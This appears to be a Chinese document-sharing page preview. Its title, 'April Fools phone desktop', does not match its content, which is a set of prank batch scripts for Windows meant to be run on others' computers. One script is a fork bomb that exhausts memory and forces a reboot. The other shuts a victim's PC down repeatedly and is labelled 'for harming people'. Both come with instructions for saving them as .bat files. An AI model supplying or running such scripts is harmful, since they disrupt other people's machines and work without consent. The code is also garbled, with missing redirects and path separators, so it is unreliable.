愚人节手机桌面.docxVIP

  • 2
  • 0
  • 约8.52千字
  • 约 15页
  • 2019-12-13 发布于湖北
  • 举报
愚人节手机桌面 【篇一:愚人节捉弄人小程序】 第一个:让别人内存over(逼他重启) @echo off start cmd %0 就这3行了 打开“开始→程序→附件→记事本”,把代码部分复制进去,点“另存为”,路径选“你想要放的地方”,保存类型为“所有文件”,文件名为“你想要的名字.bat”,你的批量处理器就完成了。 第二个:让对方重启指定次数(害人专用) @echo off if not exist c:1.txt echo. c:1.txt goto err1 if not exist c:2.txt echo. c:2.txt goto err1 if not exist c:3.txt echo. c:3.txt goto err1 if not exist c:4.txt echo. c:4.txt goto err1 if not exist c:5.txt echo. c:5.txt goto err1 goto err2 :err1 shutdown -s -t 0 :err2 上面可以让对方电脑重启5次后不在重启,当然如果你修改一下加个if not exist c:6.txt echo. c:6.txt goto err1那就是重启6次 改成7就是7次... 打开“开始→程序

文档评论(0)

1亿VIP精品文档

相关文档